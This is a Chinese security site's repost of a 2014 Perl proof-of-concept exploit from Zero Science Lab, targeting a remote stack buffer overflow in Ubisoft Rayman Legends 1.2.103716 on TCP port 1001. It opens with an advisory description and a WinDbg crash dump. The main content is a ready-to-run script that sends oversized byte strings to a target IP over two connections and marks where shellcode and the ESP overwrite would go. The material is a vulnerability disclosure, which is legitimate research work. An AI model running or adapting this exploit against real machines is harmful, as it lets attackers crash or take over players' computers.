首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ubisoft Rayman Legends 1.2.103716 Buffer Overflow
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2014-06-18  
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset() boundary error in the
# processing of incoming data thru raw socket connections on TCP port 1001,
# which can be exploited to cause a stack based buffer overflow by sending a
# long string of bytes on the second connection. Successful exploitation could
# allow execution of arbitrary code on the affected node.
#
# ===========================================================================
#
# (15a8.f0c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0         nv up ei pl nz na pe cy
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
# MSVCR100!memset+0x5f:
# 715e26df f3ab            rep stos dword ptr es:[edi]
# 0:028> d esp
# 0f16dcec  42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00  BBBBd...........
# 0f16dcfc  42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c  BBBBBBBB"...PBK.
# 0f16dd0c  90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00  .C......(.......
# 0f16dd1c  50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f  PBK.l.......L...
# 0f16dd2c  e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07  ....H.......<...
# 0f16dd3c  3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41  <......u....AAAA
# 0f16dd4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
# 0f16dd5c  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
# 22.05.2014
# 
#

use IO::Socket;

print
 "
 @****************************************@
 |                                        |
 | Ubisoft Rayman Legends BoF PoC Script  |
 |                                        |
 |              ZSL-2014-5187             |
 |                                        |
 @****************************************@
 ";

$ip="$ARGV[0]";

if($#ARGV!=0)
{
   print "\n\n\x20\x20\x1c\x20Usage: ___FCKpd___0 <ipaddr>\n\n";
   exit();
}

print "\n\x20\x1c\x20Target: $ip\n";
print "\x20\x1c\x20Initiating first connection\n";

sleep 2;
$conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn1)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn1 "\x44"x36;
print $conn1 "\x45\x45\x45\x45";
print $conn1 "\x46"x2000; # SC contain
print "\x20\x1c\x20Payload sent\n";
close $conn1;
print "\x20\x1c\x20First stage completed\n\x20\x1c\n";
print "\x20\x1c\x20Initiating second connection\n";

sleep 2;
$conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn2)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn2 "\x41" x 16;
print $conn2 "\x42\x42\x42\x42"; # ESP ->
print $conn2 "\x43"x1000; # SC contain
print "\x20\x1c\x20Payload sent\n";
print "\x20\x1c\x20Second stage completed\n";
close $conn2;
print "\x20\x1c\x20t00t!\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy File Management Web Serve
·Rocket Servergraph Admin Cente
·Adobe Reader for Android addJa
·docker 0.11 VMM-container Brea
·Yealink VoIP Phone SIP-T38G -
·Ericom AccessNow Server Buffer
·Yealink VoIP Phone SIP-T38G -
·AlienVault OSSIM av-centerd Co
·Yealink VoIP Phone SIP-T38G -
·D-link DSL-2760U-E1 - Persiste
·Yealink VoIP Phone SIP-T38G -
·Linux Kernel <= 3.13 - Local P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved